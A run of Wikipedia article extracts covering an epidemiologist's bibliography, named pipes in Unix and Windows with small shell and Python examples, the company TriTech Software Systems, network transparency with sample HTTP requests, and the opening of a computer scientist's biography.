Khachadurian AK, Armenian HK: Familial Paroxysmal Polyserositis (FPP): A Report of 120 Cases from Lebanon. Pediatric Research, 6:362-702;1972.
Khachadurian AK, Armenian HK: The Management of Familial Paroxysmal Polyserositis (Familial Mediterranean Fever). Experience with Low Fat Diets and Clofibrate. Lebanese Medical Journal, 25:495 502;1972.
Armenian HK, Khachadurian AK: Familial Paroxysmal Polyserositis, Clinical and Laboratory Findings in 120 Cases. Lebanese Medical Journal, 26:605 14; 1973.
Armenian HK, Lilienfeld AM: The Distribution of Incubation Periods of Neoplastic Diseases. American Journal of Epidemiology, 99:92 100;1974.
Khachadurian AK, Armenian HK: Familial Paroxysmal Polyserositis. Mode of Inheritance and Incidence of Amyloidosis. Proceedings of the Fifth Conference on the Clinical Delineation of Birth Defects, Baltimore, Maryland. Birth Defects: Original Article Series, 10:62 6;1974.
Armenian HK, Lilienfeld AM, Diamond EL, Bross IDJ: Relation Between Benign Prostatic Hyperplasia to Cancer of the Prostate. A Prospective and Retrospective Study. Lancet, 2:115 17;1974.
Armenian HK, Lilienfeld AM, Diamond EL, Bross IDJ: Epidemiologic Characteristics of Patients with Prostatic Neoplasms, American Journal of Epidemiology, 102:47 54;1975.
Armenian HK, Uthman SM: Familial Paroxysmal Polyserositis. Lebanese Medical Journal. 28:439 42;1975.
Armenian H K: Medicine and the Nomads. Modern Medicine Middle East, 1:8 11;1975.
Kabakian HA, Armenian HK, Deeb ZL, Rizk GK: Asymmetry of the Pelvic Ureters in Normal Females. American Journal of Roentgenology, 127(5):723 7;1976.
Armenian HK: Developing A Quality Assurance Program in the State of Bahrain. Quality Review Bulletin, J.C.A.H. 4:9 11;1978.
Sawaya J, Atweh G, Armenian HK: Coronary Care Experience in a University Hospital. Middle East Journal of Anesthesiology 5:249 67;1979.
Sawaya JI, Mujais SK, Armenian HK: Early Diagnosis of Pericarditis in Acute Myocardial Infarction. American Heart Journal, 100:144 51;1980.
Armenian HK: Evaluation and Projections for the Primary Health Care System in Bahrain. Bahrain Medical Bulletin, 2:71 5;1980.
Hamadeh RR, Armenian HK, Zurayk HC: Clustering of Cases of Leukemia, Hodgkin's Disease and Other Lymphomas in Bahrain. Tropical and Geographical Medicine, 33:42 9;1981.
Armenian HK, Dajani AW, Fakhro AM: Impact of Peer Review and Itemized Medical Record Forms on Medical Care in a Health Center in Bahrain. Quality Review Bulletin, 7:6 11;1981.
Armenian HK, Khuri M: Age at Onset of Genetic Diseases. An Application for Sartwell's Model of the Distribution of Incubation Periods. M.E.J. Anesthesiology, 113:596 605;1981.
Armenian HK, Chamieh MA, Baraka A: Influence of Wartime Stress and Psychosocial Factors in Lebanon on Analgesic Requirements for Post Operative Pain. Social Science and Medicine, 15E:63 6;1981.
Kimball A, Hamadeh RR, Mahmood RAH, Khalfan S, Muhsin A, Ghabrial F, Armenian HK: Gynecomastia Among Children in Bahrain. Lancet, February 28, 1981.
Armenian HK: Genetic and Environmental Factors in the Etiology of Familial Paroxysmal Polyserositis. Tropical and Geographical Medicine. 34:183 87;1982.
Khachadurian AK, Uthman S, Armenian HK: Association of Tendon Xanthomas and Corneal Arcus with Coronary Heart Disease in Heterozygous Familial Hypercholesterolemia. World Congress of Cardiology, June, 1982.
Armenian HK: Enrollment Bias and Variation in Clinical Manifestations: A Review of Consecutive Cases of Familial Paroxysmal Polyserositis. Journal of Chronic Disease, 36:209 12;1983.
Armenian HK, Lilienfeld AM: Incubation Period of Disease, Epidemiology Reviews, 5:1 15;1983.
Yazigi A, Zahr L, Armenian HK: Patient Compliance in a Well Baby Clinic. Effect of Two Modes of Intervention. Tropical and Geographical Medicine, 38(2):104 09;1986
Armenian HK: In Wartime: Options for Epidemiology. American Journal of Epidemiology, 124:28 32;1986.
Armenian HK, Sha'ar KH: Epidemiologic Observations in Familial Paroxysmal Polyserositis. Epidemiology Reviews, 8:106 16;1986.
Armenian HK, Zurayk HC, Kazandjian VA: The Epidemiology of Infant Deaths in the Armenian Parish Records of Lebanon. International Journal of Epidemiology, 15:372 77;1986.
Lockwood Hourani L, Armenian H, Zurayk H, Afifi L: A Population Based Survey of Loss and Psychological Distress During War. Social Science and Medicien. 23:269 75;1986.
Armenian HK, Issa JP, Sahakian V, Tawa C, Ariss L, Dona F, Saliba K: Snoring and hypertension in a study sample from Lebanon. Lebanese Medical Journal, 36:25 7;1986.
Obermeyer CM, Armenian HK, Azoury R: Endometriosis in Lebanon. A Case Control Study. American Journal of Epidemiology, 124:762 7;1986.
Armenian HK, Saadeh FM, Armenian SL: Widowhood and Mortality in an Armenian Church Parish in Lebanon. American Journal of Epidemiology, 125:127 32;1987.
Darwish MJ, Armenian HK: A Case Control Study of Rheumatoid Arthritis in Lebanon. International Journal of Epidemiology, 16:420 24;1987.
Armenian HK: Incubation Periods of Cancer: Old and New. Journal of Chronic Diseases, 40:95 155;1987.
Armenian HK, Lakkis NG, Sibai AM, Halabi SS: Hospital Visitors as Controls. American Journal of Epidemiology, 127:404 06;1988.
Armenian HK, Acra A. From the missionaries to the endemic war: Public health action and research at the American University of Beirut. Journal of Public Health Policy, 9:261 72;1988.
Armenian HK, Chamieh MA, Darwish MJ: The use of the lognormal distribution to study the time of occurrence of drug induced diseases. Journal of Clinical Research & Drug Development, 2:101 13;1988.
Armenian HK, Hamadeh RR, Chamieh MA, Rumaihi N: Seasonal variation of hospital deaths in some Middle Eastern countries. Lebanese Science Bulletin, 4(2):55 64;1988.
Armenian HK. Perceptions from epidemiologic research in an endemic war. Social Science and Medicine, 28:643 47;1989.
Armenian HK, Halabi SS, Khlat M. Epidemiology of primary health problems in Beirut. Journal of Epidemiology and Community Health, 43:315-318;1989.
Armenian HK, McCarthy JF, Balabanian SG. Patterns of mortality in Armenian parish records from eleven countries. American Journal of Epidemiology, 130(6):1227-1235;1989.
Noji EK, Kelen GD, Armenian HK et al. The 1988 earthquake in Soviet Armenia: A case study. Annals of Emergency Medicine 19:891-97;1990.
Sibai AM, Armenian HK, Alam S. Wartime determinants of arteriographically confirmed coronary artery disease in Beirut. Middle East Journal of Anesthesiology. 1991 Feb; 11(1): 25–38.
Pereira Fonseca MG, Armenian HK. Use of the Case-Control Method in Outbreak Investigations. American Journal of Epidemiology, 133(7):748-752;April 1991.
Armenian HK. Case investigation in epidemiology. American Journal of Epidemiology, 134 (10):1067-1072;1991.
Armenian HK, Noji EK, Oganesian AP. A case-control study of injuries due to the earthquake in Armenia. Bulletin of the World Health Organization, 70(2):251-257;1992.
Palenicek J, Fox R, Margolick J, Farzadegan H, Hoover D, Odaka N, Rubb S, Armenian H, Harris J, Saah A. Longitudinal Study of Homosexual Couples Discordant for HIV-1 Antibodies in the Baltimore MACS. Journal of Acquired Immune Deficiency Syndrome, 5:1204-1211;1992.
Armenian HK, McCarthy JF, Balbanian SG. Patterns of Infant Mortality from Armenian Parish Records: A Study from Ten Countries of the Diaspora between 1737 and 1982. International Journal of Epidemiology, 22(3):457-462;1993.
Batieha AM, Armenian HK, Norkus EP, Morris JS, Spate VE, Comstock GW. Serum Micronutrients and the Subsequent Risk of Cervical Cancer in a Population Based Nested Case-Control Study. Cancer Epidemiology Biomarkers and Prevention 2:335-339; July/August 1993.
Armenian HK, Hoover DR, Rubb S, Metz S, Kaslow R, Visscher B, Chmiel J, Kingsley L, Saah A. A Composite Risk Score for Kaposi's Sarcoma Based on a Case-Control and Longitudinal Study in the MACS Population. American Journal of Epidemiology, 138(4):256-265;1993
Hoover DR, Black C, Jacobson LP, Martinez-Maza, O, Seminara D, Saah A, Von Roenn J, Anderson R, Armenian HK. An Epidemiological Analysis of Kaposi's Sarcoma as an Early and Late AIDS Outcome in Gay Men. American Journal of Epidemiology, 138(4):266-278;1993.
Noji EK, Armenian HK, Oganessian A. Issues of rescue and medical care following the 1988 Armenian earthquake. International Journal of Epidemiology. 1993 Dec; 22(6): 1070–6.
Armenian HK, Lilienfeld DE. Applications of the case-control method. Overview and Historical Perspective. Epidemiology Reviews 16(1):1-5;1994.
Dwyer DM, Strickler H, Goodman RA, Armenian HK. Use of Case-Control Studies in Outbreak Investigations. Epidemiology Reviews 16(1):109-123;1994.
Armenian HK, Gordis L. Future Perspectives on the Case-Control Method. Epidemiology Reviews 16(1):163-164;1994.
Armenian HK, Invited Commentary on The Distribution of Incubation Periods of Infectious Disease, American Journal of Epidemiology 141(5):385; March 1, 1995.
Jacobson LP and Armenian HK. Epidemiology of Kaposi's Sarcoma: An Integrated Approach. Current Opinion in Oncology,7:450-455;1995.
Armenian HK, Szklo M. Morton Levin (1904-1995): history in the making. American Journal of Epidemiology. 143(6):648-9.
Armenian HK, Hoover DR, Rubb S, Metz S, Martinez-Maza O, Chmiel J, Kingsley L, Saah A. Risk Factors for Non-Hodgkin's Lymphomas in Acquired Immunodeficiency Syndrome (AIDS), American Journal of Epidemiology, 143(4):374-9;1996.
Pratt LA, Ford DE, Crum R, Armenian HK, Gallo JJ, Eaton WW. Depression, Psychotropic Medication and Risk of Myocardial Infarction. Circulation 94(12):3123-3129, December 15, 1996.
Eaton WW, Armenian HK, Gallo JJ, Pratt L & Ford DE. Depression and Risk for Onset of Type II Diabetes: A prospective population-based study, Diabetes Care, 19(10):1097-1101, 1996.
Armenian HK, From Disasters to Inner City Environment: Psychological Determinants of Physical Illness, Journal of Epidemiology 6(4 Suppl):S49-S52, 1997.
Armenian HK, Melkonian A, Noji EK, Hovanesian AP: Deaths and Injuries due to the Earthquake in Armenia: A Cohort Approach, International Journal of Epidemiology, 26(4):806-13, 1997.
Hisada M, Mueller NE, Welles SL, Okayama A, Armenian HK, Hoover DR, Rubb S, Metza S., Saah A., Chmiel J. Risk factors for non-Hodgkin's lymphomas in acquired immunodeficiency syndrome (AIDS). American Journal of Epidemiology 147(8):681-2.
Harty L, Caporaso N, Hayes R, Winn D, Terry B, Blot W, Kleinman D, Brown L, Armenian HK, Fraumeni J, Shields P. Alcohol Dehydrogenase 3 Genotype and Risk of Oral Cavity and Pharyngeal Cancer, Journal of the National Cancer Institute 89(22):1698-705, 1997.
Vlahov D, Junge B, Brookmeyer R, Cohn S, Riley E, Armenian H, Beilenson P. Reductions in High Risk Drug Use Behaviors Among Participants in the Baltimore Needle Exchange Program, Journal of Acquired Immune Deficiency Syndromes and Human Retrovirology, 16(5):400-406, 1997.
Armenian HK, Pratt, LA, Gallo J, Eaton WW. Psychopathology as a Predictor of Disability: a Population Based Follow-Up Study in Baltimore. American Journal of Epidemiology, 148(3):269-75;1998.
Armenian HK, Melkonian AK, Hovanesian AP. Long Term Mortality and Morbidity Related to Degree of Damage Following the 1988 Earthquake in Armenia, American Journal of Epidemiology, 148(11):1077-1084;1998.
Wang SS, O'Neill JP, Qian GS, Zhu YR, Wang JB, Armenian H, Zarba A, Wang JS Kensler TW, Cariello NF, Groopman JD, Swenberg JA. Elevated HPRT mutation frequencies in aflatoxin-exposed residents of Daxin Qidong County, People's Republic of China. Carcinogenesis, 20(11):979-84; 1999.
Bovasso G, Eaton W, Armenian H. The long-term outcomes of mental health treatment in a population-based study, Journal of Consulting and Clinical Psychology, 67:529-38; 1999.
Schroeder JR, Saah AJ, Hoover DR, Margolick JB, Ambinder RF, Martinez-Maza O, Crabb Breen E, Jacobson LP, Variakojis D, Rowe DT, Armenian HK. Serum Soluble CD23 Level Correlates with Subsequent Development of AIDS-Related Non-Hodgkin's Lymphoma. Cancer Epidemiology Biomarkers and Prevention. November 1999.
Blanchard JF, Armenian HK, Paoulter Friesen P. Risk factors for abdominal aortic aneurysms: a case-control study. American Journal of Epidemiology 151(6): 575–83; 2000.
Blanchard JF, Armenian HK, Peeling R, Poulter Friesen P, Shen C, Burnham RC. The relation between Chlamydia Pneumoniae infection and abdominal aortic aneurysm: A case-control study. Clinical Infectious Disease 2000;30(6):946-47
Jacobson LP, Jenkins FJ, Springer G, Munoz A, Shah KV, Phair J, Zhang ZF and Armenian H. Interaction of HIV-1 and HHV-8 Infections and the Incidence of Kaposi's Sarcoma. Journal of Infectious Diseases 2000; 181:1940-9.
Gallo JJ, Armenian HK, Ford DE, Eaton WW, Khachatruian AS. Major Depression and cancer: the 13 year follow-up of the Baltimore Epidemiologic Catchment Area sample (United States). Cancer Causes and Control 11:751-58, 2000.
Armenian HK, Masahiro M, Melkonian AK, Hovanesian AP, Haroutunian N, Saigh PA, Akiskal K, Akiskal HS. Loss as a determinant of PTSD in a cohort of adult survivors of the 1988 earthquake in Armenia; implications for policy. Acta Psychiatrica Scandinavica 2000:102(1):58-64.
Swartz KL, Pratt LA, Armenian HK, Lee LC, Eaton WW. Mental Disorders and the Incidence of Migraine Headaches in the Community Sample: Results from the Baltimore ECA Follow-up Study. Archives in General Psychiatry, October 2000.
Sibai AM, Fletcher A, Armenian HK. Variations in the Impact of Long-term Wartime Stressors on Mortality among Middle-aged and Older Populations in Beirut, 1983–93. American Journal of Epidemiology 154(2):128-137;2001.
Gregory, PC; Gallo, JJ; Armenian, H. Occupational physical activity and the development of impaired mobility - The 12-year follow-up of the Baltimore epidemiologic catchment area sample. American Journal of Physical Medicine and Rehabilitation, 80(4)270-75 April 2001.
Hsing AW, Chang L, Nomura AM, Isaacs WB, Armenian HK. A glimpse into the future. Epidemiology Review 2001; 23(1):2.
Bogner HR, Sammel MD, Ford DE, Armenian HK, Eaton WW. Urinary Incontinence and Psychological Distress Among Community-Dwelling Older Adults. Journal of the American Geriatric Society 50:1-7, 2002.
Armenian HK, Morikawa M, Melkonian AK, Hovanesian A, Akiskal K, Akiskal HS. Risk Factors for Depression in the Survivors of the 1988 Earthquake in Armenia. Journal of Urban Health: Bull of the New York Academy of Medicine, 79(3): 373–82, September 2002.
Babayan ZV, McNamara RL, Nagajothi N, Kasper EK, Armenian HK, Powe NR, Baughman, KL. Lima JAC. Predictors of Cause-Specific Hospital Readmissions in Patients with Congestive Heart Failure. Clinical Cardiology, 26, 411–418, 2003.
Bernstein KT, Jacobson LP, Jenkins FJ, Vlahov D, Armenian HK. Factors associated with human herpesvirus type 8 infection in an injecting drug user cohort. Sexually Transmitted Diseases. 2003 March; 30 (3): 199–204.
Meyer CM, Armenian HK, Eaton WW, Ford DE. Incident hypertension associated with depression in the Baltimore Epidemiologic Catchment area follow-up study. Journal of Affective Disorders. 2004 December; 83(2-3):127-133.
Schneider MF, Gange SJ, Margolick JB, Detels R, Chmiel JS, Rinaldo C, Armenian HK. Application of Case-Crossover and Case-time-control study designs in analyses of time-varying predictors of T-cell homeostasis failure. Annals of Epidemiology 15(2):137-144; February 2005.
Lucas KE, Armenian HK, Debusk K, Calkins HG, Rowe PC. Characterizing Gulf War Illnesses: Neurally mediated hypotension and postural tachycardia syndrome. American Journal of Medicine. 118, 1421-27:2005.
Mehio-Sibai A, Feinleib M, Sibai TA and Armenian HK. A positive or a negative confounding variable? A simple teaching aid for clinicians and students. Annals of Epidemiology 15 (6):421-3: July 2005.
Srapyan Z, Armenian HK, Petrosyan V. Health-related quality of life and depression among older people in Yerevan, Armenia: a comparative survey of retirement home and household residents aged 65 years old and over. Age and Ageing, Advance Access, vol 35(2): 190–193, published Oxford University Press on behalf of the British Geriatrics Society: January 2006.
Lucas KE, Armenian HK, Petersen GM, Rowe PC. Familial aggregation of fainting in a case-control study of neurally mediated hypotension patients who present with unexplained chronic fatigue. Europace 2006 October; 8(10): 846–851. Epub 2006 Aug 18.
Sahakyan A, Armenian H, Breitscheidel L., Thompson M, Yenokyan G. Feeding practices of babies and the development of atopic dermatitis in children after 12 months of age in Armenia: is there a signal?" European Journal of Epidemiology, 2006; 21(9): 723–725. Epub 2007 April 5.
Armenian, HA, Armenian Medical Roots, Public Health: An Armenian Perspective. Armenian Medical Review, pp. 22–25. (September, 2006).
Lucas KE, Rowe PC, Armenian HK. Latency and exposure-health associations in Gulf War veterans with early fatigue onsets: a case-control study. Annals of Epidemiology. 2007 Oct;17(10):799-806. Epub 2007 Jul 26.
Mussolino ME, Armenian HK. Low bone mineral density, coronary heart disease, and stroke mortality in men and women: the Third National Health and Nutrition Examination Survey. Annals of Epidemiology. 2007 Nov;17(11):841-6. Epub 2007 Aug 28.
Shiels MS, Cole SR, Wegner S, Armenian H, Chmiel JS, Ganesan A, Marconi VC, Martinez-Maza O, Martinson J, Weintrob A, Jacobson LP, Crum-Cianflone NF. Effect of HAART on incident cancer and noncancer AIDS events among male HIV seroconverters. Journal of Acquire Immune Deficiency Syndrom. 2008 Aug 1;48(4):485-90.
Armenian, HK. Quality Assurance Parallels in Health Care Evaluation and Educational Assessment: The American University of Armenia Experience. Education for Health Journal, Epub. July 2009.
Armenian, HK. Epidemiology: a problem-solving journey. American Journal of Epidemiology. 2009 Jan 15; 169 (2): 127–31. Epub 2008 Nov 12.
Sevoyan MK, Sarkisian TF, Belaryan AA, Shahsuvaryan GR, Armenian HK. Prevention of Amyloidosis in Familial Mediterranean Fever with Colchicine. A Case-Control Study in Armenia. Medical Principles and Practice 115, 2009
Armenian HK, Khatib R. Developing an Instrument of Measuring Human Dignity and Its Relationship to Health in Palestinian Refugees. World Medical & Health Policy, Vol. 2: Iss. 2, Article 3, 2010.
Petrosyan D, Armenian HK. Interaction of maternal age and mode of delivery in the development of postpartum depression in Yerevan, Armenia. Journal of Affective Disorders, Vol. 135, Issues 1–3, Pages 77–81, December 2011
Yenokyan G, Armenian HK. Triggers for Attacks in Familial Mediterranean Fever: application of the Case-Crossover Design. American Journal of Epidemiology. American Journal of Epidemiology, volume 175, issue 10, 2012
Khachadourian V, Armenian HK, Demirchyan A, Goenjian A. Loss and Psycho-social Factors as Determinants of Quality of Life in a Cohort of Earthquake Survivors. Health and Quality of Life Outcomes. Health and Quality of Life Outcomes. 2015, Feb 13:13.
Anahit Demirchyan, Vahe Khachadourian, Haroutune K Armenian, Varduhi Petrosyan. Short and Long Term Determinants of Incident Multimorbidity in a Cohort of 1988 Earthquake Survivors in Armenia. International Journal for Equity in Health. August 20, 2013.
Harutyunyan A, Armenian H and Petrosyan V. Interbirth interval and history of previous preeclampsia: a case–control study among multiparous women. BMC Pregnancy and Childbirth. December 27, 2013
Demirchyan A, Petrosyan, D, Armenian, HK. Rate and predictors of postpartum depression in a 22-year follow-up of a cohort of earthquake survivors in Armenia. Archives of Women's Mental Health. 2014 Jun 17(3): 229-37
Demirchyan A, Petrosyan V, Armenian HK, Khachadourian V. Prospective study of predictors of poor self-rated health in a 23-year cohort of earthquake survivors in Armenia. Journal of Epidemiology and Global Health. 2015, Feb. doi:10.1016/j.jegh.2014.12.006
Khachadourian V, Armenian HK, Demirchyan A, Melkonian A, Hovanesian A. Post Earthquake Psychopathological Investigation in Armenia: research methodology, summary of previous findings and recent follow-up. Disasters. Europe PMC. 16 Nov 2015, 40(3):518-533.DOI: 10.1111/disa.12166 PMID 26578424
Book reviews, letters to the editor and other
Sunlight and Breast Cancer Incidence in the USSR. International Journal of Epidemiology 20(4);1145-1146, 1991.
Lives at Risk: Public Health in the Nineteenth-Century Egypt by LaVerne Kuhnke, University of California Press, Berkeley, 1990,243pp. Egypt's Other Wars: Epidemics and the Politics of Public Health by Nancy Elizabeth Gallagher, Syracuse University Press, Syracuse, New York 1990, 256pp. American Journal of Epidemiology 136(6):761-762, 1992.
Manual of Epidemiology for District Health Management Edited by J.P. Vaughan and R.H. Morrow, World Health Organization, Geneva, 1989, 198pp. American Journal of Epidemiology 133(9):956-957, 1992.
History of Epidemiology: Proceedings of the 13th International Symposium on the Comparative History of Medicine—East and West Edited by K. Yosio, S. Shizu, O. Yasuo, Ishiyaku EuroAmerica, Inc. Tokyo, Japan, 1993, 224pp. American Journal of Epidemiology 139(1), 1994:110-111.
The Cambridge World History of Human Disease Edited by K.F. Kiple, Cambridge University Press, Cambridge England, 1993, 1176pp.
The Public Health Consequences of Disasters by Eric Noji(ed), Oxford University Press, American Journal of Epidemiology 146(2):205-206, 1997.
Risk Factors for Non-Hodgkin's Lymphomas in Acquired Immunodeficiency Syndrome (AIDS), American Journal of Epidemiology 146(8):681-682, 1997.
Sibai, AM; Armenian, HK. Long-term psychological stress and heart disease. Int J Epidemiol, 29(5):948-948 October 2000.
Archie Cochrane: Back to the Front by F Xavier Bosch and R Molas (eds), published privately, Barcelona, Spain, 2003, pp. 234. American Journal of Epidemiology 2005;162:917-918.
Psychological distress among adolescents in Chengdu, Sichuan at one month after the 5.12.2008 earthquake – by professor Joseph TF Lau. Journal of Urban Health.
Thesis for the Degree of Doctor of Public Health
Armenian HK: The Relationship of Benign Prostatic Hyperplasia to Cancer of the Prostate. An Epidemiological Study. Johns Hopkins University, School of Hygiene and Public Health, Baltimore, Maryland, 1974.
References
External links
“Itineraries in Life” An Art Show Featuring Artwork from Dr. Haroutune Armenian
Interview Dr. Haroutune Armenian
H. Armenian: With a Vision of Higher Achievements (in Armenian: Յ. Արմէնեան Աւելի Բարձր Նուաճումներու Տեսլականով)
Expressions of Beauty in Wartime and Beyond
1942 births
Living people
People from Beirut
American educational theorists
American people of Armenian descent
Heads of universities and colleges in the United States
Lebanese people of Armenian descent
Lebanese emigrants to the United States
American University of Beirut alumni
Johns Hopkins University alumni
UCLA School of Public Health faculty
|
714167
|
https://en.wikipedia.org/wiki/Named%20pipe
|
Named pipe
|
In computing, a named pipe (also known as a FIFO for its behavior) is an extension to the traditional pipe concept on Unix and Unix-like systems, and is one of the methods of inter-process communication (IPC). The concept is also found in OS/2 and Microsoft Windows, although the semantics differ substantially. A traditional pipe is "unnamed" and lasts only as long as the process. A named pipe, however, can last as long as the system is up, beyond the life of the process. It can be deleted if no longer used. Usually a named pipe appears as a file, and generally processes attach to it for IPC.
In Unix
Instead of a conventional, unnamed, shell pipeline, a named pipeline makes use of the filesystem. It is explicitly created using mkfifo() or mknod(), and two separate processes can access the pipe by name — one process can open it as a reader, and the other as a writer.
For example, one can create a pipe and set up gzip to compress things piped to it:
mkfifo my_pipe
gzip -9 -c < my_pipe > out.gz &
In a separate shell, independently, one could send the data to be compressed:
cat file > my_pipe
The named pipe can be deleted just like any file:
rm my_pipe
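The same reader/writer pattern can also be driven programmatically. The following is a minimal Python sketch for Unix-like systems (the pipe name my_pipe and the message text are arbitrary placeholders):

import os

pipe_name = "my_pipe"
if not os.path.exists(pipe_name):
    os.mkfifo(pipe_name)              # create the named pipe in the filesystem

if os.fork() == 0:
    # Child process: open the pipe for writing and send one line.
    with open(pipe_name, "w") as writer:
        writer.write("hello through the FIFO\n")
    os._exit(0)
else:
    # Parent process: open the pipe for reading; open() blocks until
    # a writer has attached to the other end.
    with open(pipe_name, "r") as reader:
        print(reader.readline(), end="")
    os.wait()                         # reap the child
    os.unlink(pipe_name)              # remove the pipe like any other file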
A named pipe can be used to transfer information from one application to another without the use of an intermediate temporary file. For example, you can pipe the output of gzip into a named pipe like so:
mkfifo -m 0666 /tmp/namedPipe
gzip -d < file.gz > /tmp/namedPipe
Then load the uncompressed data into a MySQL table like so:
LOAD DATA INFILE '/tmp/namedPipe' INTO TABLE tableName;
Without this named pipe one would need to write out the entire uncompressed version of file.gz before loading it into MySQL. Writing the temporary file is both time consuming and results in more I/O and less free space on the hard drive.
PostgreSQL's command line utility, psql, also supports loading data from named pipes.
In Windows
A named pipe can be accessed much like a file. Win32 SDK functions CreateFile, ReadFile, WriteFile and CloseHandle open, read from, write to, and close a pipe, respectively. Unlike Unix, there is no command line interface, except for PowerShell.
Named pipes cannot be created as files within a normal filesystem, unlike in Unix. Also unlike their Unix counterparts, named pipes are volatile (removed after the last reference to them is closed). Every pipe is placed in the root directory of the named pipe filesystem (NPFS), mounted under the special path \\.\pipe\ (that is, a pipe named "foo" would have a full path name of \\.\pipe\foo). Anonymous pipes used in pipelining are actually named pipes with a random name.
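As a client-side illustration only (a sketch that assumes some server process has already created a pipe named "foo" and replies with a line of text), an existing pipe can be opened through Python's ordinary file API, which reaches CreateFile under the hood:

# Windows-only sketch; the pipe name "foo" is hypothetical and must
# already have been created by a server process.
pipe_path = r"\\.\pipe\foo"

with open(pipe_path, "r+b", buffering=0) as pipe:   # open() maps to CreateFile
    pipe.write(b"hello from the client\r\n")
    print(pipe.readline())                          # read the server's reply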
They are very rarely seen by users, but there are notable exceptions. The VMware Workstation PC hardware virtualization tool, for instance, can expose emulated serial ports to the host system as named pipes, and the WinDbg kernel mode debugger from Microsoft supports named pipes as a transport for debugging sessions (in fact, VMware and WinDbg can be coupled together – as WinDbg normally requires a serial connection to the target computer – letting driver developers do their development and testing on a single computer). Both programs require the user to enter names in the \\.\pipe\name form.
Windows NT named pipes can inherit a security context.
Summary of named pipes on Microsoft Windows:
Intermachine and intramachine IPC
Half-duplex or full-duplex
Byte-oriented or packet-oriented
Reliable
Connection-oriented communication
Blocking or Nonblocking read and write (choosable)
Standard device I/O handles (ReadFile, WriteFile)
Namespace used to create handles
Inefficient WAN traffic (explicit data transfer request, unlike e.g. TCP/IP sliding window, etc.)
Peekable reads (read without removing from pipe's input buffer)
The .NET Framework 3.5 has added named pipe support.
Named pipes can also be used as an endpoint in Microsoft SQL Server.
Named pipes are also a networking protocol in the Server Message Block (SMB) suite, based on the use of a special inter-process communication (IPC) share. SMB's IPC can seamlessly and transparently pass the authentication context of the user across to Named Pipes. Windows NT's entire NT Domain protocol suite of services is implemented as DCE/RPC services over Named Pipes, as are the Exchange 5.5 administrative applications.
See also
Anonymous pipe
Anonymous named pipe
Unix file types
References
External links
Linux Interprocess Communications: Named Pipes (Linux Documentation Project, 1996)
Introduction to Named Pipes (Linux Journal, 1997)
Inter-process communication
|
33802433
|
https://en.wikipedia.org/wiki/TriTech%20Software%20Systems
|
TriTech Software Systems
|
TriTech Software Systems, formerly known as American Tritech, is a public safety software company based in San Diego, California, with offices in San Ramon, California; Hillsboro, Oregon; Decorah, Iowa; Castle Hayne, North Carolina; Melville, New York; Marlborough, Massachusetts; and Montreal, Quebec, Canada.
History
TriTech was founded in 1991 in San Diego, California by Christopher D. Maloney. Maloney had interned at a San Diego emergency transport company, where he saw the need for a more efficient dispatch paradigm. TriTech's first products were for the emergency transport market; the company was originally named American TriTech but was renamed TriTech Software Systems in 1998, as its business was not limited to the United States. In 2018, TriTech merged with three other public sector software companies to form CentralSquare Technologies.
Products
TriTech supports five distinct product lines and is considered a key player in the security control room market. In 2020, Chicago announced Computer Aided Dispatch, Mobile, and Analytics software by TriTech for its 9-1-1 center.
See also
Computer-aided dispatch
Emergency medical services
References
Companies based in San Diego
Software companies based in California
Law enforcement equipment
Software companies of the United States
|
1786529
|
https://en.wikipedia.org/wiki/Network%20transparency
|
Network transparency
|
Network transparency, in its most general sense, refers to the ability of a protocol to transmit data over the network in a manner which is transparent (invisible) to those using the applications that are using the protocol. In this way, users of a particular application may access remote resources in the same manner in which they would access their own local resources. An example of this is cloud storage, where remote files are presented as being locally accessible, and cloud computing where the resource in question is processing.
X Window
The term is often applied, only partly correctly, in the context of the X Window System, which is able to transmit graphical data over the network and integrate it seamlessly with applications running and displaying locally; however, certain extensions of the X Window System are not capable of working over the network.
Databases
In a centralized database system, the only available resource that needs to be shielded from the user is the data (that is, the storage system). In a distributed DBMS, a second resource needs to be managed in much the same manner: the network. Preferably, the user should be protected from the network operational details. Then there would be no difference between database applications that would run on the centralized database and those that would run on a distributed one. This kind of transparency is referred to as network transparency or distribution transparency. From a database management system (DBMS) perspective, distribution transparency requires that users do not have to specify where data is located.
Some have separated distribution transparency into location transparency and naming transparency.
Location transparency in commands used to perform a task is independent both of locations of the data, and of the system on which an operation is carried out.
Naming transparency means that a unique name is provided for each object in the database.
Firewalls
Transparency in firewall technology can be defined at the networking (IP or Internet layer) or at the application layer.
Transparency at the IP layer means the client targets the real IP address of the server. If a connection is non-transparent, then the client targets an intermediate host (address), which could be a proxy or a caching server. IP layer transparency could be also defined from the point of server's view. If the connection is transparent, the server sees the real client IP. If it is non-transparent, the server sees the IP of the intermediate host.
Transparency at the application layer concerns whether the client application must use the protocol in a different way. An example of a transparent HTTP request, addressed directly to a server:
GET / HTTP/1.1
Host: example.org
Connection: Keep-Alive
An example non-transparent HTTP request for a proxy (cache):
GET http://foo.bar/ HTTP/1.1
Proxy-Connection: Keep-Alive
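Both request forms can be produced with a few lines of Python using the standard socket module (a minimal sketch; example.org, port 80 and the proxy address 127.0.0.1:3128 are placeholders):

import socket

def http_get(host, port, request_target):
    # Send a minimal HTTP/1.1 GET and return the raw response bytes.
    request = ("GET " + request_target + " HTTP/1.1\r\n"
               "Host: example.org\r\n"
               "Connection: close\r\n\r\n").encode("ascii")
    with socket.create_connection((host, port)) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)

# Transparent: connect to the origin server and request a path.
transparent = http_get("example.org", 80, "/")

# Non-transparent: connect to a proxy (placeholder address) and request
# an absolute URL, proxy-style.
proxied = http_get("127.0.0.1", 3128, "http://example.org/")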
Application layer transparency is symmetric when the same working mode is used on both the sides. The transparency is asymmetric when the firewall (usually a proxy) converts server type requests to proxy type or vice versa.
Transparency at the IP layer does not automatically mean application layer transparency.
See also
Data independence
Replication transparency
References
Telecommunications
Data management
|
57023129
|
https://en.wikipedia.org/wiki/Jo%C3%ABlle%20Coutaz
|
Joëlle Coutaz
|
Joëlle Coutaz is a French computer scientist, specializing in human-computer interaction (HCI). Her career includes research in the fields of operating systems and HCI, as well as being a professor at the University of Grenoble. Coutaz is considered a pioneer in HCI in France, and in 2007, she was awarded membership to SIGCHI. She was also involved in organizing CHI conferences and was a member on the editorial board of ACM Transactions on Computer-Human Interaction. She has authored over 130 publications, including two books, in the domain of human-computer interaction.
Career
